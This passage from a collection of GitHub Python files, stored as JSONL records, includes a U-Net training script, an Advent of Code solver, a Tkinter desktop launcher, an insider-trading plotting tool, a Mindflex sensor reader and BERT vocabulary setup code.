in_f=in_new_f, out_f=160, alpha=alpha, stride=2, expansion=6,block_id=13)\n #, 8\n enc_15, in_new_f = inverted_res_block(inputs=enc_14, in_f=in_new_f, out_f=160, alpha=alpha, stride=1, expansion=6,block_id=14)\n enc_16, in_new_f = inverted_res_block(inputs=enc_15, in_f=in_new_f, out_f=160, alpha=alpha, stride=1, expansion=6,block_id=15)\n enc_17, in_new_f = inverted_res_block(inputs=enc_16, in_f=in_new_f, out_f=320, alpha=alpha, stride=1, expansion=6,block_id=16)\n # UP\n\n x = ConvLayer(kw=1, kh=1, in_f=in_new_f, out_f=1280, use_bias=False, activation=None, name='Conv_1/weights')(enc_17)\n x = BatchNormLayer(D=1280, name='Conv_1/BatchNorm')(x)\n x = ActivationLayer(activation=tf.nn.relu6, name='out_relu')(x)\n\n bottleneck, in_new_f = inverted_res_block(inputs=x, in_f=1280, out_f=160, alpha=alpha, stride=1, expansion=6, block_id=17)\n # \n\n upconv1, in_new_f = upconv(input_tensor=bottleneck, in_f=in_new_f, out_f=160, stride=1, block_id=18)\n upconv2, in_new_f = upconv(input_tensor=upconv1, in_f=in_new_f, out_f=160, stride=1, block_id=19)\n upconv3, in_new_f = upconv(input_tensor=upconv2, in_f=in_new_f, out_f=160, stride=1, block_id=20)\n\n upconv4, in_new_f = upconv(input_tensor=upconv3, in_f=in_new_f, out_f=96, stride=1, block_id=21)\n upconv5, in_new_f = upconv(input_tensor=upconv4, in_f=in_new_f, out_f=96, stride=1, block_id=22)\n upconv6, in_new_f = upconv(input_tensor=upconv5, in_f=in_new_f, out_f=96, stride=1, block_id=23)\n upconv7, in_new_f = upconv(input_tensor=upconv6, in_f=in_new_f, out_f=64, stride=1, block_id=24)\n upconv8, in_new_f = upconv(input_tensor=upconv7, in_f=in_new_f, out_f=64, stride=1, block_id=25, concat_tensor=enc_9)\n\n upconv9, in_new_f = upconv(input_tensor=upconv8, in_f=in_new_f, out_f=64, stride=1, block_id=26)\n upconv10, in_new_f = upconv(input_tensor=upconv9, in_f=in_new_f, out_f=64, stride=1, block_id=27)\n upconv11, in_new_f = upconv(input_tensor=upconv10, in_f=in_new_f, out_f=64, stride=1, block_id=28, concat_tensor=enc_6)\n\n upconv12, in_new_f = upconv(input_tensor=upconv11, in_f=in_new_f, out_f=32, stride=1, block_id=29)\n upconv13, in_new_f = upconv(input_tensor=upconv12, in_f=in_new_f, out_f=32, stride=1, block_id=30)\n upconv14, in_new_f = upconv(input_tensor=upconv13, in_f=in_new_f, out_f=32, stride=1, block_id=31, concat_tensor=enc_3)\n\n upconv15, in_new_f = upconv(input_tensor=upconv14, in_f=in_new_f, out_f=24, stride=1, block_id=32)\n upconv16, in_new_f = upconv(input_tensor=upconv15, in_f=in_new_f, out_f=24, stride=1, block_id=33, concat_tensor=enc_1)\n\n upconv17, in_new_f = upconv(input_tensor=upconv16, in_f=in_new_f, out_f=16, stride=1, block_id=34)\n\n upconv18, in_new_f = upconv(input_tensor=upconv17, in_f=in_new_f, out_f=16, stride=1, block_id=35, concat_tensor=in_x)\n\n output_x = ConvLayer(kw=1, kh=1, in_f=16, out_f=10, name='output')(upconv18)\n\n return in_x, output_x\n\n\nif __name__ == \"__main__\":\n gamma_list = [0.5, 0.75, 1.0, 1.5, 2.0]\n \n makiflow.set_main_gpu(1)\n Xtrain, Ytrain, num_pos = load_data()\n \n Xtest = Xtrain[-5:]\n Ytest = Ytrain[-5:]\n num_pos_test = num_pos[-5:]\n \n# 15\n Xtrain, Ytrain, num_pos = augment_data(Xtrain[:-5], Ytrain[:-5], num_pos[:-5])\n Xtrain, Ytrain, num_pos = shuffle(Xtrain, Ytrain, num_pos)\n \n Xtest, Ytest, num_pos_test = augment_data(Xtest, Ytest, num_pos_test)\n Xtest, Ytest, num_pos_test = shuffle(Xtest, Ytest, num_pos_test)\n \n Xtrain = np.array(Xtrain, dtype=np.float32) / 255\n Ytrain = np.array(Ytrain, dtype=np.uint8)\n Xtest = np.array(Xtest, dtype=np.float32) / 255\n Ytest = np.array(Ytest, dtype=np.uint8)\n \n for img_index in range(5):\n sns.heatmap(Ytest[img_index]).get_figure().savefig(f'result/test_{img_index}.png')\n plt.clf()\n \n in_x, output_x = get_MobileNetV2_1_224(batch_size=32)\n model = Segmentator(input_s=in_x, output=output_x)\n untrainable = [(name, False) for name in layer_name]\n model.set_layers_trainable(untrainable)\n model.set_session(tf.Session())\n \n model.load_weights('weights/weights_30.ckpt', layer_name)\n \n optimizer = tf.train.AdamOptimizer(learning_rate=10e-4)\n \n with open('test.txt', 'w') as test_out:\n for gamma in gamma_list:\n model.set_session(tf.Session())\n model.load_weights('weights/weights_30.ckpt', layer_name)\n optimizer = tf.train.AdamOptimizer(learning_rate=10e-4)\n\n loss_list = []\n iou_list = []\n for i in range(10):\n loss_list += model.fit_focal(images=Xtrain, labels=Ytrain, gamma=gamma, num_positives=num_pos, optimizer=optimizer, epochs=5)\n pred = model.predict(Xtest[:32])\n iou_list += dice_coeff(Ytest[:32], pred, 10, True)\n for img_index in range(5):\n sns.heatmap(pred[img_index].argmax(axis=2)).get_figure().savefig(f'result/gamma={gamma}_epochs={5 * (i+1)}_{img_index}.png')\n plt.clf()\n test_out.write(str(loss_list))\n test_out.write(str(iou_list))\n","repo_name":"Banayaki/EyePit","sub_path":"TestUnetMobileGamma.py","file_name":"TestUnetMobileGamma.py","file_ext":"py","file_size_in_byte":22579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"72017054793","text":"\"\"\"\nimport mimodulo.funcs as f\n\nf.hello()\nf.bye()\n\nf.hello_by_name(\"Pepe\")\nf.hello_by_name(\"Antonio\")\nn = \"Maria\"\nf.hello_by_name(n)\nf.hello_by_name(2.3)\nf.hello_by_name(name=\"Marisa\")\n\n\nprint(f.mifunc(2, 1, 3))\nprint(f.mifunc(2, 1))\nprint(f.mifunc(2))\n\nprint(f.mifunc(2, val2=3))\nprint(f.mifunc(val1=2,val2=3))\nprint(f.mifunc()+5)\n\nprint(f.mifunc5(2, 1, 3))\n\"\"\"\n\nimport mimodulo.funcs as f\n\ntop=30\nfilename = \"score_data.json\"\n\nscore_list = f.get_score(filename)\n\nf.score_top_print(score_list)\n\nsecret = f.get_secrect(top)\n\nwhile True:\n input(\"Dame un número para acertar el secreto: \")\n\n f.save_score(filename, score_list)\n\n\n\n\n\ndef suma(x, y):\n s = x + y\n return s\n\nprint (suma(5,3))\n\ns = suma(3,2)\nz = suma(s, 5)\n\n\n\n\n\n\n\n\n","repo_name":"EnriquePJ76/smartninja","sub_path":"clase9/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"1360425176","text":"#import re\n#import json\n#from enum import Enum\n#import copy\n#import numpy as np\n#from collections import deque\nimport math\nimport operator\n\ndata = open(\"data.txt\", \"r\")\nlines = data.readlines()\n\n# don't think my python has dataclass\nclass BusData:\n def __init__(self, t, o):\n # bus id \n self.time = t\n # bus offset from 0\n self.offset = o\n\n def __repr__(self):\n return str(self.time) + \"@\" + str(self.offset)\n\nbus = []\n\ns = lines[1].split(\",\")\norder = 0\nfor t in s:\n if not t == \"x\":\n # order modulus bus time, as we're only looking up to bus time ahead\n # this is fine cause if bus+o is good, then bus + o + n * t is good\n bus.append(BusData(int(t), order%int(t)))\n order += 1\n\n# start with the biggest bus time\nsearch = bus.copy()\nsearch.sort(key=operator.attrgetter('time'))\nsearch.reverse()\n\nprint(search)\n\nbusmax = search[0]\nsearch.remove(busmax)\n\ncur = busmax.time - busmax.offset\nstep = busmax.time\n\nfor bus in search:\n while True:\n # check current\n next_t = bus.time * math.ceil(cur/bus.time)\n if next_t == cur + bus.offset:\n break\n\n cur += step\n\n # at this point we know the buses so far all align, therefore we can step by their product\n step *= bus.time\n\nprint(cur)\n","repo_name":"rkjfb/advent2020","sub_path":"13/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"6935974626","text":"from sys import setrecursionlimit\r\nsetrecursionlimit(10**5)\r\nn, m, k = map(int, input().split())\r\n#n = row, m = col\r\ngrid = [[0 for _ in range(m)] for _ in range(n)]\r\n\r\nresult = []\r\nfor _ in range(k):\r\n r_, c_ = map(int, input().split())\r\n grid[r_-1][c_-1] = 1\r\n\r\nvisited = [[False for _ in range(m)] for _ in range(n)]\r\ndirection = [(-1, 0), (1, 0), (0, -1), (0, 1)]\r\n\r\ndef DFS(cur_x, cur_y):\r\n size = 1\r\n visited[cur_x][cur_y] = 1\r\n for dx, dy in direction:\r\n nx = cur_x + dx\r\n ny = cur_y + dy\r\n if 0<=nx]+\\?>)\", r\"\\1\", rawXml) + \"\")\n # return ET.parse(sourceFolderpath + '\\\\data\\\\' + shipLayoutName + '.xml')\n except FileNotFoundError:\n logger.error('No layout XML file found for shipBlueprint layout attribute: %s' % shipLayoutName)\n\n\ndef saveShipLayoutStandalone(layout, shipLayoutName, sourceFolderpath, developerBackup):\n os.makedirs(sourceFolderpath + '\\\\data\\\\', exist_ok=True)\n filepath = sourceFolderpath + '\\\\data\\\\' + shipLayoutName + '.xml'\n ET.ElementTree(layout).write(filepath, encoding='utf-8', xml_declaration=True)\n removeRootNode(filepath)\n if developerBackup == True:\n os.makedirs('layouts/', exist_ok=True)\n developerBackupFilepath = 'layouts/' + shipLayoutName + '.xml'\n ET.ElementTree(layout).write(developerBackupFilepath, encoding='utf-8', xml_declaration=True)\n removeRootNode(developerBackupFilepath)\n\n\ndef saveShipLayoutAsAppendFile(appendContentString, shipLayoutName, addonFolderpath, developerBackup):\n os.makedirs(addonFolderpath + '\\\\data\\\\', exist_ok=True)\n filepath = addonFolderpath + '\\\\data\\\\' + shipLayoutName + '.xml.append'\n if os.path.exists(filepath):\n os.remove(filepath)\n with open(filepath, \"w\") as appendFile:\n appendFile.write(appendContentString)\n if developerBackup == True:\n os.makedirs('layouts/', exist_ok=True)\n developerBackupFilepath = 'layouts/' + shipLayoutName + '.xml.append'\n with open(developerBackupFilepath, \"w\") as appendFile:\n appendFile.write(appendContentString)\n\n\ndef removeRootNode(filepath):\n # taken and heavily adjusted from https://pynative.com/python-delete-lines-from-file/\n with open(filepath, 'r+') as file:\n content = file.read()\n file.seek(0)\n content = content.replace(\"\", '').replace(\"\", '')\n file.write(content)\n file.truncate()\n","repo_name":"Epirasque/FTLshipGibGenerator","sub_path":"fileHandling/ShipLayoutDao.py","file_name":"ShipLayoutDao.py","file_ext":"py","file_size_in_byte":2516,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"20481165570","text":"# -*- coding: utf-8 -*-\nfrom tkinter import*\nimport os\nimport string\nimport random\nfrom PIL import ImageTk,Image\n\nMAX_ROWS = 36\nFONT_SIZE = 10 # (pixels)\n\nCOLORS = ['snow', 'ghost white', 'white smoke', 'gainsboro', 'floral white', 'old lace',\n 'linen', 'antique white', 'papaya whip', 'blanched almond', 'bisque', 'peach puff',\n 'navajo white', 'lemon chiffon', 'mint cream', 'azure', 'alice blue', 'lavender',\n 'lavender blush', 'misty rose', 'dark slate gray', 'dim gray', 'slate gray',\n 'light slate gray', 'gray', 'light grey', 'midnight blue', 'navy', 'cornflower blue', 'dark slate blue',\n 'slate blue', 'medium slate blue', 'light slate blue', 'medium blue', 'royal blue', 'blue',\n 'dodger blue', 'deep sky blue', 'sky blue', 'light sky blue', 'steel blue', 'light steel blue',\n 'light blue', 'powder blue', 'pale turquoise', 'dark turquoise', 'medium turquoise', 'turquoise',\n 'cyan', 'light cyan', 'cadet blue', 'medium aquamarine', 'aquamarine', 'dark green', 'dark olive green',\n 'dark sea green', 'sea green', 'medium sea green', 'light sea green', 'pale green', 'spring green',\n 'lawn green', 'medium spring green', 'green yellow', 'lime green', 'yellow green',\n 'forest green', 'olive drab', 'dark khaki', 'khaki', 'pale goldenrod', 'light goldenrod yellow',\n 'light yellow', 'yellow', 'gold', 'light goldenrod', 'goldenrod', 'dark goldenrod', 'rosy brown',\n 'indian red', 'saddle brown', 'sandy brown',\n 'dark salmon', 'salmon', 'light salmon', 'orange', 'dark orange',\n 'coral', 'light coral', 'tomato', 'orange red', 'red', 'hot pink', 'deep pink', 'pink', 'light pink',\n 'pale violet red', 'maroon', 'medium violet red', 'violet red',\n 'medium orchid', 'dark orchid', 'dark violet', 'blue violet', 'purple', 'medium purple',\n 'thistle', 'snow2', 'snow3',\n 'snow4', 'seashell2', 'seashell3', 'seashell4', 'AntiqueWhite1', 'AntiqueWhite2',\n 'AntiqueWhite3', 'AntiqueWhite4', 'bisque2', 'bisque3', 'bisque4', 'PeachPuff2',\n 'PeachPuff3', 'PeachPuff4', 'NavajoWhite2', 'NavajoWhite3', 'NavajoWhite4',\n 'LemonChiffon2', 'LemonChiffon3', 'LemonChiffon4', 'cornsilk2', 'cornsilk3',\n 'cornsilk4', 'ivory2', 'ivory3', 'ivory4', 'honeydew2', 'honeydew3', 'honeydew4',\n 'LavenderBlush2', 'LavenderBlush3', 'LavenderBlush4', 'MistyRose2', 'MistyRose3',\n 'MistyRose4', 'azure2', 'azure3', 'azure4', 'SlateBlue1', 'SlateBlue2', 'SlateBlue3',\n 'SlateBlue4', 'RoyalBlue1', 'RoyalBlue2', 'RoyalBlue3', 'RoyalBlue4', 'blue2', 'blue4',\n 'DodgerBlue2', 'DodgerBlue3', 'DodgerBlue4', 'SteelBlue1', 'SteelBlue2',\n 'SteelBlue3', 'SteelBlue4', 'DeepSkyBlue2', 'DeepSkyBlue3', 'DeepSkyBlue4',\n 'SkyBlue1', 'SkyBlue2', 'SkyBlue3', 'SkyBlue4', 'LightSkyBlue1', 'LightSkyBlue2',\n 'LightSkyBlue3', 'LightSkyBlue4', 'SlateGray1', 'SlateGray2', 'SlateGray3',\n 'SlateGray4', 'LightSteelBlue1', 'LightSteelBlue2', 'LightSteelBlue3',\n 'LightSteelBlue4', 'LightBlue1', 'LightBlue2', 'LightBlue3', 'LightBlue4',\n 'LightCyan2', 'LightCyan3', 'LightCyan4', 'PaleTurquoise1', 'PaleTurquoise2',\n 'PaleTurquoise3', 'PaleTurquoise4', 'CadetBlue1', 'CadetBlue2', 'CadetBlue3',\n 'CadetBlue4', 'turquoise1', 'turquoise2', 'turquoise3', 'turquoise4', 'cyan2', 'cyan3',\n 'cyan4', 'DarkSlateGray1', 'DarkSlateGray2', 'DarkSlateGray3', 'DarkSlateGray4',\n 'aquamarine2', 'aquamarine4', 'DarkSeaGreen1', 'DarkSeaGreen2', 'DarkSeaGreen3',\n 'DarkSeaGreen4', 'SeaGreen1', 'SeaGreen2', 'SeaGreen3', 'PaleGreen1', 'PaleGreen2',\n 'PaleGreen3', 'PaleGreen4', 'SpringGreen2', 'SpringGreen3', 'SpringGreen4',\n 'green2', 'green3', 'green4', 'chartreuse2', 'chartreuse3', 'chartreuse4',\n 'OliveDrab1', 'OliveDrab2', 'OliveDrab4', 'DarkOliveGreen1', 'DarkOliveGreen2',\n 'DarkOliveGreen3', 'DarkOliveGreen4', 'khaki1', 'khaki2', 'khaki3', 'khaki4',\n 'LightGoldenrod1', 'LightGoldenrod2', 'LightGoldenrod3', 'LightGoldenrod4',\n 'LightYellow2', 'LightYellow3', 'LightYellow4', 'yellow2', 'yellow3', 'yellow4',\n 'gold2', 'gold3', 'gold4', 'goldenrod1', 'goldenrod2', 'goldenrod3', 'goldenrod4',\n 'DarkGoldenrod1', 'DarkGoldenrod2', 'DarkGoldenrod3', 'DarkGoldenrod4',\n 'RosyBrown1', 'RosyBrown2', 'RosyBrown3', 'RosyBrown4', 'IndianRed1', 'IndianRed2',\n 'IndianRed3', 'IndianRed4', 'sienna1', 'sienna2', 'sienna3', 'sienna4', 'burlywood1',\n 'burlywood2', 'burlywood3', 'burlywood4', 'wheat1', 'wheat2', 'wheat3', 'wheat4', 'tan1',\n 'tan2', 'tan4', 'chocolate1', 'chocolate2', 'chocolate3', 'firebrick1', 'firebrick2',\n 'firebrick3', 'firebrick4', 'brown1', 'brown2', 'brown3', 'brown4', 'salmon1', 'salmon2',\n 'salmon3', 'salmon4', 'LightSalmon2', 'LightSalmon3', 'LightSalmon4', 'orange2',\n 'orange3', 'orange4', 'DarkOrange1', 'DarkOrange2', 'DarkOrange3', 'DarkOrange4',\n 'coral1', 'coral2', 'coral3', 'coral4', 'tomato2', 'tomato3', 'tomato4', 'OrangeRed2',\n 'OrangeRed3', 'OrangeRed4', 'red2', 'red3', 'red4', 'DeepPink2', 'DeepPink3', 'DeepPink4',\n 'HotPink1', 'HotPink2', 'HotPink3', 'HotPink4', 'pink1', 'pink2', 'pink3', 'pink4',\n 'LightPink1', 'LightPink2', 'LightPink3', 'LightPink4', 'PaleVioletRed1',\n 'PaleVioletRed2', 'PaleVioletRed3', 'PaleVioletRed4', 'maroon1', 'maroon2',\n 'maroon3', 'maroon4', 'VioletRed1', 'VioletRed2', 'VioletRed3', 'VioletRed4',\n 'magenta2', 'magenta3', 'magenta4', 'orchid1', 'orchid2', 'orchid3', 'orchid4', 'plum1',\n 'plum2', 'plum3', 'plum4', 'MediumOrchid1', 'MediumOrchid2', 'MediumOrchid3',\n 'MediumOrchid4', 'DarkOrchid1', 'DarkOrchid2', 'DarkOrchid3', 'DarkOrchid4',\n 'purple1', 'purple2', 'purple3', 'purple4', 'MediumPurple1', 'MediumPurple2',\n 'MediumPurple3', 'MediumPurple4', 'thistle1', 'thistle2', 'thistle3', 'thistle4',\n 'gray1', 'gray2', 'gray3', 'gray4', 'gray5', 'gray6', 'gray7', 'gray8', 'gray9', 'gray10',\n 'gray11', 'gray12', 'gray13', 'gray14', 'gray15', 'gray16', 'gray17', 'gray18', 'gray19',\n 'gray20', 'gray21', 'gray22', 'gray23', 'gray24', 'gray25', 'gray26', 'gray27', 'gray28',\n 'gray29', 'gray30', 'gray31', 'gray32', 'gray33', 'gray34', 'gray35', 'gray36', 'gray37',\n 'gray38', 'gray39', 'gray40', 'gray42', 'gray43', 'gray44', 'gray45', 'gray46', 'gray47',\n 'gray48', 'gray49', 'gray50', 'gray51', 'gray52', 'gray53', 'gray54', 'gray55', 'gray56',\n 'gray57', 'gray58', 'gray59', 'gray60', 'gray61', 'gray62', 'gray63', 'gray64', 'gray65',\n 'gray66', 'gray67', 'gray68', 'gray69', 'gray70', 'gray71', 'gray72', 'gray73', 'gray74',\n 'gray75', 'gray76', 'gray77', 'gray78', 'gray79', 'gray80', 'gray81', 'gray82', 'gray83',\n 'gray84', 'gray85', 'gray86', 'gray87', 'gray88', 'gray89', 'gray90', 'gray91', 'gray92',\n 'gray93', 'gray94', 'gray95', 'gray97', 'gray98', 'gray99']\n\ndef color_choice():\n root = Tk()\n root.title(\"Named colour chart\")\n row = 0\n col = 0\n for color in COLORS:\n e = Label(root, text=color, background=color, \n font=(None, -FONT_SIZE))\n e.grid(row=row, column=col, sticky=E+W)\n row += 1\n if (row > 36):\n row = 0\n col += 1\n \n root.mainloop()\n\n\nfilen=os.listdir(os.getcwd())\nfiles = []\nfor i in range(len(filen)):\n if '.py' in filen[i]:\n files.append(filen[i])\n\ndef refreshe():\n fichier = open(\"./sources/settings/colors\",\"r\")\n couleur=fichier.read()\n fichier.close()\n window.config(bg=couleur)\n\ndef shutdown():\n os.popen(\"shutdown -f now\",\"r\")\n\ndef ba():\n global button0\n global files\n global barre\n \n barre = Tk()\n barre.geometry(\"80x140\")\n barre.config(bg=couleur)\n barre.title(\"barre de lancement d'applications\")\n button0=Listbox(barre,xscrollcommand='YES',yscrollcommand='YES')\n button0.pack()\n button0.bind('',runa)\n button0.config(bg=couleur)\n if couleur == 'black':\n button0.config(fg='white')\n nbr=0\n fichier = open('./sources/settings/sombre','r')\n sombre = fichier.read()\n fichier.close()\n \n if sombre == 'oui':\n button0.config(bg='black',fg='white')\n else:\n barre.config(bg=couleur)\n for name in files:\n nbr+=1\n if name[:-3]=='accueuil':\n continue\n elif name[:-3]=='main':\n continue\n elif name[:-3]=='current':\n continue\n elif name[:-3]=='game':\n continue\n elif name[:-3]=='test':\n continue\n elif name[:-3]=='player':\n continue\n elif name[:-3]=='window':\n continue\n \n elif name[-3:]=='.py':\n a=name[:-3]\n button0.insert(END,name[:-3])\n button0.insert(END,'réglages')\n \ndef runa(event):\n if button0.get(button0.curselection()[0]) == 'réglages':\n reglages()\n else:\n os.popen('python3 '+button0.get(button0.curselection()[0])+'.py','r')\n \ndef butge(a):\n alea = random.randint(0,10)\n if alea == 4:\n fichier = open(\"./sources/settings/jeu.txt\",\"w\")\n fichier.write(a)\n fichier.close()\n os.popen(\"python3 test.py\")\n else:\n a=os.popen(\"python3 \"+a+\".py\",\"r\").read()\n print(a)\n\ndef sobre():\n global mode\n global barre\n if mode == 'oui':\n fichier = open(\"./sources/settings/sombre\",\"w\")\n fichier.write('non')\n fichier.close()\n window.config(bg=couleur)\n mode = 'non'\n if barre :\n barre.config(bg=couleur)\n if couleur == 'black':\n button0.config(bg=couleur,fg='white')\n else:\n button0.config(bg=couleur,fg='black')\n elif mode == 'non':\n fichier = open(\"./sources/settings/sombre\",\"w\")\n fichier.write('oui')\n fichier.close()\n window.config(bg='black')\n mode = 'oui'\n if barre :\n barre.config(bg='black')\n button0.config(bg='black',fg='white')\n \ndef reglages():\n file = open('./sources/settings/sombre','r')\n so = file.read()\n file.close()\n \n global color_change\n global emplacementent\n global mode\n global hello\n sett = Tk()\n sett.title(\"settings\")\n sett.geometry(\"400x400\")\n hello=StringVar()\n entre = Button(sett,text = \"valider la couleure\", command=couleure)\n refresh = Button(sett, text = \"rafraichir l'écran\", command=refreshe)\n sombritude = Checkbutton(sett, text='mode sombre',command=sobre)\n sombritude.pack()\n different_colors=Button(sett, text='toutes les couleurs',command=color_choice)\n different_colors.pack()\n if so == 'oui':\n sombritude.select()\n mode = 'oui'\n elif so =='non':\n sombritude.deselect()\n mode='non'\n color_change = Entry(sett)\n label_color = Label(sett, text=\"Entrez la couleure : \")\n \n label_color.pack()\n color_change.pack()\n entre.pack()\n refresh.pack()\n\ndef couleure():\n global couleur\n couleur=str(color_change.get())\n if couleur == 'anton appel est la plus belle personne qui existe sur terre':\n file=open('./fichiers/texte/wp.txt','w')\n file.write('Anton est effectivement la plus jolie personne au monde mais pas besoin de le crier sur tous les toits, on le sait déja tous x).')\n file.close()\n color_change.delete(0,END)\n color_change.insert(END,'/texte/wp.txt')\n else:\n try:\n if couleur == 'sombre':\n fichier = open(\"./sources/settings/sombre\",'w')\n fichier.write('oui')\n fichier.close()\n window.config(bg='black')\n else:\n window.config(bg=couleur)\n fichier = open(\"./sources/settings/colors\", \"w\")\n fichier.write(couleur)\n fichier.close()\n \n except TclError:\n color_change.delete(0,END)\n color_change.insert(END,'Mauvaise couleur indiquée')\n\ndef navigateur():\n os.popen(\"python3 internet.py\", \"r\")\n\n\ndef destroy(event):\n window.destroy()\n\n\n\n#configuration des couleurs\nfichier=open(\"./sources/settings/colors\", \"r\")\ncouleur=fichier.read()\nfichier.close()\n\n\n\n# configuration de la fenetre\nwindow = Tk()\n\nwindow.bind(\"\"+\"q\",destroy)\nwindow.title(\"bureau\")\nwindow.attributes('-fullscreen', True)\n\nwindow.config(bg=couleur)\n\nfile = open('./sources/settings/sombre','r')\nso = file.read()\nfile.close()\n\nif so == 'oui':\n window.config(bg = 'black')\n\nwindow.minsize(480, 360)\nframe = Frame(window, bg='black')\nright_frame = Frame(frame, bg='black',)\nleft_frame = Frame(frame, bg='black',)\nright_frame.grid(row=0, column=0, sticky=W)\nleft_frame.grid(row=0, column=2, sticky=W)\n\nframe.pack(expand=YES)\n\nbarre_menu = Button(left_frame, text=\"barre d'application\", command=ba)\nbarre_menu.pack()\n\nbarre_de_menu = Menu(window)\n\nmenu_fichier = Menu(barre_de_menu, tearoff=0)\nmenu_app = Menu(barre_de_menu, tearoff=0)\n\n\nmenu_fichier.add_command(label=\"quitter\", command=window.destroy)\nmenu_fichier.add_command(label=\"éteindre\", command=shutdown)\nmenu_app.add_command(label=\"barre d'application\", command=ba)\n\nbarre_de_menu.add_cascade(label=\"quitter\",menu=menu_fichier)\nbarre_de_menu.add_cascade(label=\"programmes\",menu=menu_app)\n\nwindow.config(menu=barre_de_menu)\n\n\nwindow.mainloop()","repo_name":"QuentinBubu/Chubuntu_1.2","sub_path":"Chubuntu_1.2/sources/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"71362751432","text":"import sys\nimport api\nimport graph\n\n\ndef main():\n print(\"Check Data on:\")\n print(\"1. Single Day\")\n print(\"2. Multiple Days\")\n print(\"3. 26-01-2020 to 26-01-2021\")\n choice = int(input(\"Choice: \"))\n res = None\n if choice == 1:\n checkSingleDay()\n elif choice == 2:\n checkMultipleDays()\n elif choice == 3:\n checkMultipleDays(ffrom_date=\"26-01-2020\", tto_date= \"26-01-2021\")\n else:\n print(\"Invalid Choice\")\n sys.exit(-1) \n\ndef checkSingleDay():\n chk_date = input(\"Enter data as 26-01-2021: \")\n res = api.fetchEquityDataForSingleDay(on_date=chk_date, useCache=True)\n if res is None:\n print(\"Error API broke or No results\")\n else:\n graph.plotCompanyConsolidated(res, f\"Insider Trading: {chk_date}\", saveImage=True)\n\ndef checkMultipleDays(ffrom_date=None, tto_date=None):\n if ffrom_date is None or tto_date is None:\n print(\"Enter date range (inclusive)\")\n ffrom_date = input(\"Enter FROM data as 26-01-2021: \")\n tto_date = input(\"Enter TO data as 26-01-2021: \")\n res = api.fetchEquityData(from_date=ffrom_date,to_date=tto_date,useCache=True)\n if res is None:\n print(\"Error API broke or No results\")\n else:\n print(\"\\nAnalyze:\")\n print(\"1. All companies consolidated\")\n print(\"2. Single Company over this Time\")\n choice = int(input(\"Choice: \"))\n if choice==1:\n graph.plotCompanyConsolidated(res, f\"Insider Trading: {ffrom_date} to {tto_date}\", saveImage=True)\n elif choice==2:\n sym = input(\"Enter symbol: \")\n graph.plotTargetCompanyByDate(res,sym,f\"Insider Trading at {sym}: {ffrom_date} to {tto_date}\",saveImage=True)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"yashx/InsiderTradingNSE","sub_path":"onlineMain.py","file_name":"onlineMain.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"15615862285","text":"import gevent\nimport serial\n\nfrom ...client import NeuroClient\n\n\ntickrate = 64\ntick = 1.00 / tickrate\n\nDEVICE_PATH = '/dev/ttyACM0'\n\nSENSORS = [\n 'Signal Strength',\n 'Attention',\n 'Meditation',\n 'Delta',\n 'Theta',\n 'Low Alpha',\n 'High Alpha',\n 'Low Beta',\n 'High Beta',\n 'Low Gamma',\n 'High Gamma',\n]\n\n\nif __name__ == '__main__':\n client = NeuroClient('mindflex')\n comm = serial.Serial(DEVICE_PATH)\n\n while True:\n csv = comm.readline()\n if not csv:\n continue\n\n str_data = csv.split(',')\n if len(str_data) != len(SENSORS):\n continue\n\n data = map(float, str_data)\n sensors = dict(zip(SENSORS, data))\n\n client.record_sensors(sensors)\n\n gevent.sleep(tick)\n","repo_name":"tracyingram/neuro-game","sub_path":"neuro-collector/neuro_collector/clients/mindflex/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"1805975159","text":"from collections import namedtuple, defaultdict\n\n\ndef load_vocab_dict(vocab_file_name, vocab_max_size=None, start_vocab_count=None):\n with open(vocab_file_name) as f:\n text = [x.strip() for x in f.readlines()]\n if vocab_max_size:\n text = text[:vocab_max_size]\n if start_vocab_count:\n file_content = dict(zip(text, range(0 + start_vocab_count, len(text) + start_vocab_count)))\n else:\n file_content = dict(zip(text, range(0, len(text))))\n return file_content\n\n\ndef load_definition_dict(path):\n with open(path, 'r') as f:\n definition = [[y.strip() for y in x.strip().split('')] for x in f.readlines()]\n definition = {k:v.strip().split() for k,v in definition}\n return definition\n\n\ndef get_definition_vocab(def_dict):\n counts = {}\n for _, v in def_dict.items():\n for word in v:\n if word not in counts:\n counts[word] = 0\n counts[word] += 1\n vocab = {'': 0, '': 1}\n idx = 2\n for k, _ in sorted(counts.items(), key=lambda x: x[1], reverse=True):\n vocab[k] = idx\n idx += 1\n return vocab\n\n\nBASE_PATH = '.' # \n\nFILE_ROOT = BASE_PATH + '/data/'\nGLOVE_VEC = BASE_PATH + '/data/pretrained_vector/glove.840B.300d.txt'\nELMO_VEC = BASE_PATH + '/data/pretrained_vector/type_elmo.npz'\nEXP_ROOT = BASE_PATH + '/model'\n\n# --- BERT ---\nBERT_ROOT = FILE_ROOT + '/bert/'\n\nBERT_UNCASED_SMALL_ROOT = BERT_ROOT + 'uncased_L-12_H-768_A-12/'\nBERT_UNCASED_SMALL_CONFIG = BERT_UNCASED_SMALL_ROOT + 'bert_config.json'\nBERT_UNCASED_SMALL_MODEL = BERT_UNCASED_SMALL_ROOT + 'pytorch_model.bin'\nBERT_UNCASED_SMALL_VOCAB = BERT_UNCASED_SMALL_ROOT + 'vocab.txt'\n\n# --- Definition ---\nDEFINITION = load_definition_dict(FILE_ROOT + '/ontology/types_definition.txt') \nDEF_VOCAB_S2I = get_definition_vocab(DEFINITION)\nDEF_VOCAB_I2S = {v: k for k, v in DEF_VOCAB_S2I.items()}\nDEF_VOCAB_SIZE = len(DEF_VOCAB_S2I) # 10473\nDEF_PAD_IDX = DEF_VOCAB_S2I[''] # 